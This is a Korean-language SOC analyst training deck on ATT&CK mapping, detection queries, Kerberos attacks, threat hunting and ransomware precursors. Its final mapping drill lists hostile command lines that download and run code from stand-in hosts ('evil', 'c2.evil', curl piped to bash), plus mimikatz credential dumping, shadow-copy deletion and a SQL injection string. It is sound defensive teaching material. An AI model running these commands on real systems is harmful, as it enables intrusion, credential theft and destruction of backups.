Certificate	Certificate Registration, TLS Metadata	Zeek ssl.log, JA3	C2 (TLS 핑거프린트)
Active Directory	AD Object Creation, Modification, Access	WinEvent 4662/4769/4768	Credential Access, Lateral Movement
User Account	User Account Creation, Modification, Authentication	WinEvent 4720/4728/4776	Persistence, Privilege Escalation
Cloud Storage	Cloud Storage Access, Modification	CloudTrail S3 API, CASB	Collection (T1530), Exfiltration
Cloud Service	Cloud Service Metadata, Disable/Modify	CloudTrail, Azure Monitor	Defense Evasion (T1562.008)

💡 실무 원칙: ATT&CK 페이지에서 Technique → Detection 탭 → Data Sources에서 필요한 Data Source 확인 → 현재 수집 여부 확인 → 미수집이면 Coverage 0점 자동 판정

보강 설명 ATT&CK의 주요 Data Source와 Data Component를 완전 매핑한 참조표입니다. 탐지 룰 설계 시 어떤 로그를 수집해야 하는지 즉각… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

Data Source 완전 매핑Data Component어떤 로그 수집

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Data Source 완전 매핑·예외 조건·출력 필드를 함께 설계

최종 실습: 완전한 공격자 프로파일 작성 (15분)

수집된 증거 → 귀속 분석 → 동기 추정 → 다음 공격 예측 — CTI 분석가 수준의 프로파일 작성

공격자 프로파일 실습

제공 증거 세트

🕒 공격 시간대: 한국 시간 새벽 2~5시 (UTC+9)
🌐 C2 IP: 소속 국가 → North Korean ASN (확인)
🔧 사용 도구: Cobalt Strike + 커스텀 PowerShell 로더
🎯 타겟: 국내 암호화폐 거래소 재무팀
💰 최종 목적: 핫월렛 접근 시도 (금전 탈취)
📧 피싱: LinkedIn을 통한 채용 제안 피싱
🔑 C2 인증서 JA3: 알려진 Lazarus 시그니처와 일치
📋 TTP: T1566.003, T1059.001, T1071, T1657

프로파일 작성 항목

추정 위협 그룹	_________________________
귀속 근거 (3가지)	① _________________ ② _________________ ③ _________________
추정 동기	_________________________
Confidence 수준	☐ Low ☐ Medium ☐ High — 이유: ___
ATT&CK 그룹 ID	G_________
다음 공격 예측	_________________________
즉각 권고 사항	① _____ ② _____ ③ _____

⚠️ 귀속 주의: 사이버 귀속(Attribution)은 법적·외교적 영향이 있습니다. High Confidence 귀속은 여러 독립 증거가 필요하며, 잘못된 귀속은 심각한 결과를 초래합니다

보강 설명 수집된 IOC와 TTP를 바탕으로 공격자 프로파일을 작성하는 최종 실습입니다. 공격 그룹 귀속, 동기 추정, 다음 공격 예측까지 포함한 완전한 CTI 보고서 형식을 훈련합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

공격자 프로파일귀속 분석동기 추정

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
공격자 프로파일를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

즉각 연상 훈련: 핵심 EventID 30개 × ATT&CK 반사 매핑

암기가 아니라 패턴 이해 — 이 30개가 SOC 일상에서 80%를 차지한다

EventID 즉각 연상

EventID	즉각 연상
4624	로그인 성공 → Type 확인
4625	로그인 실패 → 횟수+IP
4648	명시적 크리덴셜 → PtH?
4672	특수 권한 → 관리자 오남용
4688	프로세스 생성 → CommandLine
4698	예약작업 등록 → 경로+실행
4720	계정 생성 → 백도어?
4728	글로벌 그룹 추가 → DA 추가?
4732	로컬 그룹 추가 → 관리자
4740	계정 잠금 → Brute Force

EventID	즉각 연상
4769	TGS 요청 → RC4 = Kerberoast
4776	NTLM 인증 → PtH 경로
4662	AD 객체 접근 → DCSync?
1102	보안로그 삭제 → 즉각 P1
7036	서비스 중지 → 보안솔루션?
7045	서비스 설치 → 신규 Persistence
5001	Defender RT 끔 → T1562.001
5145	공유 접근 → 민감 경로?
4104	PS 스크립트 블록 → 내용 분석
4103	PS 모듈 로깅 → API 호출

Sysmon EID	즉각 연상
Sysmon 1	프로세스 생성 → Parent+CmdLine
Sysmon 3	네트워크 연결 → 외부IP+Port
Sysmon 6	드라이버 로드 → 서명 확인
Sysmon 7	DLL 로드 → 인젝션?
Sysmon 8	RemoteThread → 인젝션!
Sysmon 10	ProcessAccess → lsass 타겟?
Sysmon 11	파일 생성 → 웹쉘? 페이로드?
Sysmon 13	레지스트리 수정 → Run Key?
Sysmon 22	DNS 쿼리 → C2 도메인?
Sysmon 23	파일 삭제 → 증거 인멸?

✅ 플래시카드 훈련법: 이 표를 프린트해서 EventID를 가리고 즉각 연상 연습. 일주일이면 30개 모두 자동화됨. 실무에서 로그를 볼 때 참조 시간이 0으로 줄어듦

보강 설명 가장 자주 접하는 30개 EventID를 보면 즉각 연상할 수 있도록 훈련합니다. 암기가 목표가 아니라 패턴을 이해하는 것이 목표입니다. 플래시카드처럼… 대표 예시와 로그를 묶어 보면 이해가 빨라집니다.

EventID 30개즉각 연상패턴 이해

이해 포인트

EventID 30개를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기

Zero Trust 도입 전후 ATT&CK Coverage 변화 분석

구조적 방어(Zero Trust) × 탐지(ATT&CK)의 시너지 — 도입 후 어떤 Technique가 자동 차단되는가

Zero Trust 효과 분석

ATT&CK Technique	도입 전	ZT 도입 후	변화 원인
T1078 Valid Accounts	Score 1	Score 3	MFA+디바이스 등록 → 계정만으로 접근 불가
T1021 Lateral Movement	Score 1	Score 3	마이크로 세그멘테이션 → 서버간 직접 통신 차단
T1550 Pass-the-Hash	Score 1	Score 3	NTLM 비활성화, Credential Guard
T1190 웹 취약점	Score 0	Score 2	WAF + 취약점 스캔 정기화, 완전 차단은 아님
T1566 Phishing	Score 2	Score 2	MFA로 계정 탈취 후 악용은 차단, 클릭은 여전히
T1059 PowerShell	Score 2	Score 2	ZT는 네트워크 레이어만 → 엔드포인트 Execution은 미영향
T1567 Cloud Exfil	Score 0	Score 2	CASB + 조건부 접근으로 비승인 업로드 차단
T1003 Credential Dump	Score 1	Score 2	Credential Guard → LSASS 보호, 완전 차단은 아님

핵심 인사이트

네트워크 레이어 Technique는 자동 커버: Lateral Movement·PtH·클라우드 접근이 구조적으로 차단됨
엔드포인트 Execution은 ZT 미영향: PowerShell, Process Injection은 여전히 EDR 탐지 필요
ZT는 탐지 대체재 아님: 구조적 방어 + ATT&CK 탐지 두 가지를 함께 운영해야
Coverage 향상 효율: ZT 도입 하나로 T1078, T1021, T1550 동시에 Score 향상

✅ 전략적 결론: 보안 투자를 탐지 룰만 늘리는 것보다 Zero Trust 구현과 병행하면 같은 예산으로 훨씬 높은 Coverage 향상 효과를 얻을 수 있다

보강 설명 Zero Trust 아키텍처를 도입한 후 ATT&CK Coverage가 어떻게 변화하는지 before/after 비교를 통해 보여줍니다. 구조적 방어와 탐지 Coverage의… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

Zero Trust 도입 효과Coverage 변화before after 비교

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Zero Trust 도입 효과·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

초고밀도 참조 카드 Page 1: 매핑·탐지·Coverage 핵심

이 한 장에 매핑·탐지·Coverage의 실무 핵심 전부 — 인쇄해서 즉각 참조용으로 활용

초고밀도 참조 카드

 매핑 핵심 원칙
Tactic = 목적(왜) TA####
Technique = 방법(어떻게) T####
Sub-tech = 세부 T####.###
매핑 = 근거+Confidence 항상 함께
H: 멀티시그널 | M: 단일 | L: 추정
공격은 체인 — 단일 이벤트 아님
맥락(시간·위치·행동)이 결정
다음 Tactic 예측이 가치 추가


 즉각 P0 에스컬레이션
🔴 lsass.exe ProcessAccess
🔴 vssadmin delete shadows
🔴 .enc 파일 확장자 대량 생성
🔴 EDR 에이전트 강제 중지
🔴 보안 로그 삭제 (1102)
🔴 DC 비정상 복제 요청
🔴 krbtgt 비밀번호 외부 사용
🔴 핫월렛 자격증명 비정상 접근


 Coverage 관리
0 = 로그도 룰도 없음
1 = 로그 있음, 룰 없음
2 = 룰 있음, 검증 안 됨
3 = 룰+검증 완료 (목표)
매핑 → Coverage 업데이트
분기 Purple Team → 2→3 전환
KPI: Score3 비율 + MTTD
공백 = 개선 백로그로 관리


 탐지 설계 원칙
Data Source → Component → 쿼리
룰 = Technique를 조건으로 번역
오탐 주간 TOP10 의무 튜닝
Sigma = 플랫폼 중립 표준
화이트리스트 항상 포함
임계값은 Baseline 기반
검증 계획 없는 룰 = Score 2
Git으로 버전 관리 필수


 헌팅 필수 공식
가설 = "만약 X 했다면 Y 있을 것"
테스트 가능한 형태로 수립
미발견도 가치 있는 정보
발견 → 인시던트 전환
미발견 → Coverage 2점 기록
월간 캠페인 4개 목표
Long Tail: 희귀 값에 집중
피벗: IOC → 연관 확장


 보고 핵심
30초: 시작→진행→영향→액션
경영진 = ATT&CK ID 금지
근거 없는 단정 절대 금지
모르면 "조사 중" + 기한 명시
다음 행동 반드시 구체적
Dwell Time 계산 포함
PIR = 재발방지 로드맵 필수
격리 전 증거 보존 먼저

보강 설명 Module 5 전체를 2페이지 분량의 초고밀도 참조 카드로 압축했습니다. 실무에서 언제든 꺼내볼 수 있는 완전 참조 카드입니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

완전 참조 카드초고밀도2페이지 압축

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
완전 참조 카드·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

초고밀도 참조 카드 Page 2: Tactic별 경보 → 즉각 확인 사항

경보 수신 즉시 참조 — 각 Tactic에서 반드시 확인해야 할 것과 다음에 볼 것

초고밀도 참조 카드 2

탐지 Tactic	즉각 확인 (3가지)	다음 볼 Tactic
Reconnaissance	어떤 정보 수집? 타겟 파악됐나? 연속 탐색 패턴?	Resource Dev → Initial Access
Initial Access	피싱 성공했나? 첨부파일 실행됐나? 취약점 익스플로잇 성공?	Execution → Persistence
Execution	부모 프로세스 뭔가? 아웃바운드 연결됐나? 파일 생성됐나?	Defense Evasion → C2
Persistence	어떤 경로로? 실행 계정 권한? 재부팅 후에도 유지?	Privilege Esc → Lateral Move
Privilege Escalation	어떤 권한 획득? DA? 로컬 관리자? 악용된 취약점?	Lateral Movement → Collection
Defense Evasion	어떤 보안 도구 비활성화? 로그 삭제됐나? 이후 탐지 공백?	직전 Technique 재확인 필요
Credential Access	어떤 계정 탈취? 어디서 사용됐나? AD 침해 범위?	Lateral Movement → Collection

탐지 Tactic	즉각 확인 (3가지)	다음 볼 Tactic
Discovery	어떤 정보 수집? AD 조회? 파일시스템 탐색? C2 수립됐나?	Lateral Movement 임박
Lateral Movement	어디서 어디로? 어떤 계정? DC 접근됐나?	Collection → Exfiltration
Collection	어떤 데이터? 얼마나? 어디에 모았나? 압축/암호화?	Exfiltration 임박 → 즉각 대응
C2	Beaconing 주기? 도메인 나이? 프로세스? 감염 범위?	Collection → Exfiltration
Exfiltration	어디로? 얼마나? 어떤 데이터? 차단 가능한가?	Impact 가능성 → 즉각 격리
Impact	암호화 진행 중? 백업 손상? 서비스 중단? BCP 발동?	P0 즉각 대응 + BCP 실행
Resource Dev	새 도메인/IP 인프라? 툴킷? 타겟 범위?	Initial Access 임박 → 사전 차단

💡 사용법: 경보 Tactic을 왼쪽 열에서 찾아 즉각 확인 사항 3가지 수행 → 다음에 볼 Tactic으로 모니터링 강화 → 체인 예측 → 선제 대응

보강 설명 각 Tactic이 탐지될 때 즉각 확인해야 할 사항을 한 장에 압축했습니다. 경보를 받자마자 이 슬라이드를 펼쳐서 다음 행동을 결정하는 빠른 참조… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

Tactic별 즉각 확인빠른 참조다음 행동 결정

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Tactic별 즉각 확인·예외 조건·출력 필드를 함께 설계

분석가 역량 자가 진단 × 맞춤 처방 학습 계획

12개 역량 항목을 솔직하게 점수화 → 가장 낮은 점수 2개가 다음 학습 목표가 된다

역량 진단 및 처방

역량 항목	1점 (모름)	2점 (이론)	3점 (실습)	4점 (실무)	5점 (전문)
ATT&CK 매핑 속도·정확도	☐	☐	☐	☐	☐
공격 체인 재구성 능력	☐	☐	☐	☐	☐
SIEM 탐지 쿼리 작성	☐	☐	☐	☐	☐
Sigma Rule 작성·변환	☐	☐	☐	☐	☐
Coverage 분석 수행	☐	☐	☐	☐	☐
헌팅 가설 수립·실행	☐	☐	☐	☐	☐
네트워크 로그 분석	☐	☐	☐	☐	☐
메모리·포렌식 분석	☐	☐	☐	☐	☐
CTI 보고서 TTP 추출	☐	☐	☐	☐	☐
경영진 보고서 작성	☐	☐	☐	☐	☐
Purple Team 설계·운영	☐	☐	☐	☐	☐
보안 자동화·SOAR 설계	☐	☐	☐	☐	☐

점수별 맞춤 처방

점수	처방 학습 액션
1점 (모름)	ATT&CK 공식 사이트 해당 Technique 페이지 정독 + Atomic Red Team 기초 실습 1회
2점 (이론)	DetectionLab에서 직접 시뮬레이션 + SIEM에서 관련 쿼리 2개 작성
3점 (실습)	실무 환경에 적용 + 동료에게 가르치기 (설명하면 3→4 전환)
4점 (실무)	팀 내 가이드 문서 작성 + Sigma Rule GitHub 기여
5점 (전문)	컨퍼런스 발표, 블로그 공개, 후배 멘토링

"가장 낮은 점수 2개가 다음 달 학습 계획이다. 강점을 더 키우기보다 약점을 메우는 것이 더 빠른 성장이다."

보강 설명 수강생이 자신의 현재 ATT&CK 역량을 정확하게 진단하고, 부족한 부분에 대한 구체적인 처방을 받는 슬라이드입니다. 자가 진단 결과에 따른 맞춤 학습… 대표 예시와 로그를 묶어 보면 이해가 빨라집니다.

역량 자가 진단처방 학습 계획강점 약점 파악

이해 포인트

역량 자가 진단를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기

탐지 룰 리뷰 훈련 20선 — 올바른 룰과 문제있는 룰을 구분하라

각 룰 조각을 보고 ✅(올바름) / ⚠️(개선필요) / ❌(심각한 문제)로 판단하고 이유를 설명하라

룰 리뷰 훈련

# 룰 1 — 판단? EventCode=4688 Image="*powershell*" # 룰 2 — 판단? EventCode=4688 Image|endswith:'\powershell.exe' CommandLine|contains|all: ['-enc ', '-w '] # 룰 3 — 판단? EventCode=4624 # ATT&CK 태그 없음 # 룰 4 — 판단? EventCode=4698 TaskContent|contains: '\Temp\' NOT TaskName|startswith: 'Google' # 룰 5 — 판단? CommandLine|re: ".*" # 모든 CommandLine 매치 # 룰 6 — 판단? Sysmon EventCode=10 TargetImage="*lsass*" NOT SourceImage|contains: ['System32', 'SentinelOne'] # 룰 7 — 판단? EventCode=4625 count > 3 # 3회 실패 # 룰 8 — 판단? EventCode=4625 count > 10 by IpAddress in 5min NOT IpAddress|startswith: '10.' # 룰 9 — 판단? Image|endswith: '\cmd.exe' Parent|endswith: '\WINWORD.EXE' # 룰 10 — 판단? filename|endswith: '.exe' # 모든 .exe 경보

룰 #	판단	문제점 / 이유
룰 1	⚠️	와일드카드 * 사용 → 성능 저하. endswith 사용 권장
룰 2	✅	endswith + contains\|all 조합 올바름. ATT&CK 태그 추가 필요
룰 3	⚠️	4624 단독 = 수백만 건 오탐. LogonType + 시간 조건 없음
룰 4	✅	TaskContent 경로 + 오탐 필터 포함. 더 많은 오탐 추가 권장
룰 5	❌	regex .* = 전체 매치. 의미 없는 룰 + SIEM 마비 위험
룰 6	✅	Target+Source 조합 + EDR 화이트리스트 포함. 좋은 룰
룰 7	❌	임계값 3회 = 오탐 폭발. Password Spraying 탐지 불가 (계정별 1~2회)
룰 8	✅	5분/10회/IP별 + 외부IP 제한. Spraying 탐지 적합
룰 9	✅	Office→cmd 체인 탐지. 핵심 ATT&CK 패턴. 빠르고 정확
룰 10	❌	모든 .exe = 하루 수십만 건 경보. 완전 무의미한 룰

💡 나머지 11~20번 룰: 강사가 실습 시간에 추가 제시. 수강생이 직접 판단 후 토론

보강 설명 20개의 탐지 룰 조각을 보고 룰이 올바른지 문제가 있는지 빠르게 판단하는 훈련입니다. 룰 설계 능력과 오류 발견 능력을 동시에 키웁니다. 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

룰 리뷰 훈련옳고 틀린 판단룰 오류 식별

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
룰 리뷰 훈련·예외 조건·출력 필드를 함께 설계

Kerberos 공격 4종 완전 비교 × 탐지 쿼리 실습

Kerberoasting · AS-REP · Silver Ticket · Golden Ticket — 원리·조건·탐지·방어를 한 슬라이드에 완전 정리

Kerberos 완전 마스터

공격	필요 조건	탐지 EventID	핵심 필드	방어
Kerberoasting T1558.003	도메인 계정만 있으면 가능 (권한 불필요)	4769	EncType=0x17, SPN 다수 요청 5분 내 5개+ SPN	AES256 강제 서비스 계정 강력 비번
AS-REP Roasting T1558.004	사전인증 비활성화 계정 필요 (계정 존재 확인만)	4768	PreAuthType=0 EncType=0x17	모든 계정 사전인증 활성화
Silver Ticket T1558.002	서비스 계정 해시 필요 (Kerberoasting 후 크랙)	없음 (DC 통과 안 함)	PAC 없는 티켓 DC 없이 서비스 접근	서비스 계정 비번 주기 변경 PAC 검증 활성화
Golden Ticket T1558.001	krbtgt 해시 필요 (DCSync 또는 ntds.dit)	4769 (이상 패턴)	만료 없는 TGT 존재하지 않는 계정 SID	krbtgt 2회 변경 PAM + Tier 모델

# AS-REP Roasting 탐지 쿼리 (Splunk) index=winevent EventCode=4768 # 사전인증 없음 + RC4 암호화 PreAuthType=0 TicketEncryptionType=0x17 NOT TargetUserName|endswith: '$' | table _time, TargetUserName, IpAddress # Golden Ticket 탐지 (이상 TGT 사용) index=winevent EventCode=4769 # 만료 시간이 매우 긴 티켓 TicketOptions=0x40810010 # 또는 알 수 없는 계정으로 서비스 요청 NOT TargetUserName|match: "^[a-zA-Z0-9._@-]+$" | table _time, TargetUserName, ServiceName

🚨 Silver vs Golden 핵심 차이: Silver Ticket은 DC 로그 없음(서비스 계정으로 직접 티켓 생성). Golden Ticket은 4769에 흔적. Silver가 탐지 더 어려움 — PAC 검증 활성화가 유일한 방어

보강 설명 Kerberos 기반 공격 4종(Kerberoasting, AS-REP Roasting, Silver Ticket, Golden Ticket)을 완전… 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

Kerberos 4종 비교Kerberoasting AS-…Silver Ticket Gol…

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
Kerberos 4종 비교를 고를 때 대체 설명도 함께 적기

헌팅 캠페인 결과 보고서 샘플 — 팀 공유 형식 완전판

이 형식으로 헌팅 결과를 보고하면 팀 지식이 축적되고 Coverage가 체계적으로 관리된다

헌팅 보고서 완전 샘플

헌팅 캠페인 메타데이터
ID	HUNT-2024-Q4-007
대상 Technique	T1558.003 Kerberoasting
가설	만약 공격자가 Kerberoasting을 수행했다면, 비DC 호스트에서 5분 내 5개+ RC4 TGS 요청이 있을 것
트리거	KISA 최신 보고서: 국내 금융사 Kerberoasting 침해 사례 확인
헌터	김민준 분석가 (Tier 2)
실행 기간	2024-11-25 14:00 ~ 16:30 (2.5시간)
탐색 기간	최근 30일 (2024-10-26 ~ 11-25)
데이터 소스	WinEvent 4769 (DC 보안 이벤트 로그)
쿼리 및 실행 결과
총 분석 이벤트	4769 이벤트 28,441건
조건 충족 건수	RC4+비DC+5건+ → 3건 (3개 IP)
최종 판단	3건 모두 조사 → 2건 정상(오래된 시스템), 1건 의심

⚠️ 의심 사항 상세
의심 IP	10.0.0.55 (WKST-12, 사무직 PC)
발생 시각	2024-11-08 02:33:44 ~ 02:34:02 (18초)
요청 SPN 수	7개 (MSSQLSvc, HTTP/, LDAPSvc 포함)
사용 계정	park.junho (일반 직원 계정)
비고	새벽 2시 + 사무직 PC + 7개 SPN = 수동 Kerberoast 도구 실행 강력 의심
✅ Coverage 업데이트 및 권고
Coverage 이전	T1558.003 Score 1 (로그 있음, 룰 없음)
Coverage 이후	T1558.003 Score 2 (헌팅 실행, 미탐지 사례 발견)
즉각 권고 1	10.0.0.55 EDR 조사 + park.junho 계정 비밀번호 강제 변경
즉각 권고 2	EventID 4769 기반 자동 탐지 룰 1주 내 작성 배포
중기 권고	서비스 계정 AES256 암호화 강제 + SPN 보유 계정 비밀번호 정기 변경 정책

보강 설명 실제 헌팅 캠페인을 완료한 후 팀에 공유하는 결과 보고서 샘플입니다. 가설, 실행 방법, 발견 사항, Coverage 업데이트, 개선 권고까지 완전한… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

헌팅 캠페인 결과 보고서팀 공유 형식Coverage 업데이트

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
헌팅 캠페인 결과 보고서·예외 조건·출력 필드를 함께 설계

Discovery Tactic 완전 분석: 내부 정찰 패턴과 탐지

공격자는 항상 Discovery를 한다 — 빠르고 조용한 정찰 연쇄 패턴을 탐지하는 방법

Discovery 완전 분석

공격자 Discovery 연쇄 패턴 (5분 내 발생)

# 전형적 내부 정찰 명령 시퀀스 whoami /all # T1033 사용자 확인 ipconfig /all # T1016 네트워크 정보 net user /domain # T1087.002 도메인 계정 net group "Domain Admins" /domain# T1069.002 관리자 그룹 net view /domain # T1018 원격 시스템 systeminfo # T1082 시스템 정보 tasklist /svc # T1057 프로세스 목록 netstat -ano # T1049 네트워크 연결 dir C:\Users # T1083 파일 시스템 nltest /dclist # DC 목록 → T1018

명령/행위	ATT&CK	탐지 조건	오탐 케이스
whoami /all	T1033	권한 정보 수집 파라미터 + 비IT 계정	IT 진단, 신규 PC 설정
net user /domain	T1087.002	일반 직원 PC에서 도메인 사용자 전체 조회	HR 시스템, AD 관리자
net group "DA" /domain	T1069.002	관리자 그룹 조회 + 비IT 계정 + 비업무 시간	IT 관리자 확인
nltest /dclist	T1018	DC 목록 조회 + 사무직 계정	인프라 관리
연속 5+ Discovery 명령	복합	5분 내 5개 이상 연속 실행 = 자동화 도구 사용 의심	—

# 연속 Discovery 탐지 (Splunk) index=sysmon EventCode=1 Image|endswith: ['\net.exe', '\systeminfo.exe', '\whoami.exe', '\nltest.exe'] | bucket _time span=5m | stats dc(Image) as unique_cmds values(CommandLine) as cmd_list by _time, User, ComputerName | where unique_cmds >= 4 # 5분 내 4가지 이상 정찰 도구 = 공격자

보강 설명 Discovery Tactic은 공격자가 내부 환경을 파악하는 단계로, 빠르게 지나가지만 탐지하면 공격 초기에 차단할 수 있는 기회입니다. 주요… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

T1082T1016T1087

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1082·예외 조건·출력 필드를 함께 설계

Impact Tactic 완전 분석: 랜섬웨어 전조 → 차단의 골든 타임

암호화 시작 전 5~10분 — 전조 행위를 탐지하면 랜섬웨어를 막을 수 있다

Impact 완전 분석

랜섬웨어 직전 전조 행위 타임라인

T-15

EDR/AV 비활성화 (T1562.001) — Set-MpPreference -Disable… / taskkill /F /IM [보안솔루션]

T-10

보안 로그 삭제 (T1070.001) — wevtutil cl Security / auditpol /remove

T-8

백업/복구 삭제 (T1490) — vssadmin delete shadows /all, wbadmin delete catalog

T-5

서비스 중지 (T1489) — net stop SQL / Backup / Exchange… 핵심 서비스 중지

T-0

파일 암호화 시작 (T1486) — .enc .locked .zepto 확장자 대량 변경 시작

전조별 즉각 대응 (골든 타임)

탐지 시점	즉각 대응	기대 효과
EDR 비활성화 탐지 (T-15)	해당 호스트 즉각 격리 + 메모리 덤프	랜섬웨어 배포 차단 가능
보안 로그 삭제 (T-10)	격리 + 인프라팀 긴급 연락	암호화 전 차단 가능
VSS 삭제 탐지 (T-8)	즉각 격리 + BCP 발동 준비	일부 호스트 피해 최소화
서비스 중지 (T-5)	격리 + 백업 무결성 확인 즉시	백업 복구 가능 여부 확인
암호화 시작 (T-0)	격리 + BCP 즉각 발동	확산 차단만 가능

# VSS 삭제 탐지 쿼리 — 즉각 P0 경보 index=sysmon EventCode=1 Image|endswith: '\vssadmin.exe' CommandLine|contains|all: ['delete', 'shadow'] | eval alert_level = "CRITICAL_P0" # 이 경보 = 즉각 격리, 지체 없이

보강 설명 Impact Tactic은 공격의 최종 단계입니다. 랜섬웨어 암호화 직전에 발생하는 전조 행위(VSS 삭제, 백업 삭제, 로그 삭제)를 탐지해 차단하는 방법을 완전 정리합니다. 시간 순서와 후속 조치를 같이 보면 공격 흐름이 더 또렷해집니다.

T1490T1486T1489

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1490 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

SOC 분석가 핵심 커뮤니케이션 스킬: 상황별 완전 가이드

좋은 분석 + 좋은 커뮤니케이션 = 실질적 보안 향상 — 상황별 최적 소통 방법과 실전 예시

커뮤니케이션 마스터

에스컬레이션 잘하는 법

나쁜 예: "경보가 떴는데 좀 이상한 것 같아요. 확인해 주실 수 있나요?"

좋은 예: "WKST-12에서 lsass.exe 메모리 접근이 탐지됐습니다(T1003.001). 직전에 EDR 에이전트도 중지됐고(T1562.001), 도메인 관리자 권한이 침해됐을 가능성이 있습니다. 격리 승인 부탁드립니다."

에스컬레이션 3요소

① 무엇이 (Technique ID + 한 줄 설명)
② 왜 위험한지 (비즈니스 영향)
③ 무엇이 필요한지 (구체적 요청)

다른 부서 협력 요청 방법

부서	잘못된 요청	좋은 요청
IT운영팀	"이 서버 로그 주세요"	"SQLSVR-01의 2024-11-20 02:00~06:00 WinEvent Security 로그 필요합니다. 사고 조사용이며 오늘 오후 5시까지 필요합니다"
네트워크팀	"185.107.4.9 차단해 주세요"	"C2 IP 185.107.4.9 (Threat Intel 확인됨, T1071.001)를 아웃바운드 방화벽에서 차단 요청. 영향받는 서비스 없으며 즉시 가능 여부 확인 부탁"
법무팀	"개인정보 유출된 것 같아요"	"2024-11-20 사고에서 고객 정보 포함 가능성이 있는 파일이 유출(T1567.002)된 증거가 있습니다. 신고 의무 여부와 72시간 기한 확인 부탁드립니다. 관련 증거 자료 첨부합니다"

보강 설명 기술 역량과 함께 SOC 분석가에게 필요한 커뮤니케이션 스킬을 다룹니다. 팀 내 보고, 에스컬레이션, 다른 부서와의 협업에서 효과적으로 소통하는 방법을 구체적 예시와 함께 훈련합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

SOC 커뮤니케이션에스컬레이션 방법팀 보고

이해 포인트

SOC 커뮤니케이션를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
에스컬레이션 방법 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

최종 마라톤: 50개 공격 행위 × 30분 ATT&CK 매핑

속도와 정확도를 동시에 — 30분 안에 최대한 많이, 최대한 정확하게. 팀 대항 최종 챌린지

최종 역량 측정

01. vssadmin delete shadows /all → ? 02. reg add HKCU\...\Run /v Update /d "c:\tmp\x"→ ? 03. mimikatz sekurlsa::logonpasswords → ? 04. ping -n 1 10.0.0.{1..254} → ? 05. wevtutil cl Security → ? 06. net group "Domain Admins" svc_new /add → ? 07. certutil -urlcache -f http://evil/x.exe → ? 08. mshta http://c2.evil/run.hta → ? 09. wmic /node:10.0.0.5 process call create → ? 10. Set-MpPreference -DisableRealtime $true → ? 11. POST dropbox.com/upload 5.2GB → ? 12. DNS: xk3a9bzqr.net Age:2d VT:18/94 → ? 13. EXCEL→wscript→ps.exe -enc SQB... → ? 14. WinEvent 4769 RC4 EncType=0x17 ×7 in 3min → ? 15. Sysmon 10: lsass.exe src=C:\PrgData\upd.exe→ ? 16. curl -s http://1.2.3.4/s.sh | bash → ? 17. xcopy /S \\filesvr\Finance C:\Public\ → ? 18. schtasks /create /ru SYSTEM /sc min /tn xxx → ? 19. GET /login.php?user=1'UNION+SELECT-- 200 → ? 20. VPN Login: user=kim.junho Country=KP(조선) → ? 21. nltest /dclist /domain → ? 22. regsvr32 /s /n /u /i:http://e.c2/x.sct scrobj→ ? 23. ssh -L 8080:internal:80 user@jump → ? 24. bitsadmin /transfer job http://evil/p.exe → ? 25. WinEvent 1102 SubjectUser=attacker → ?

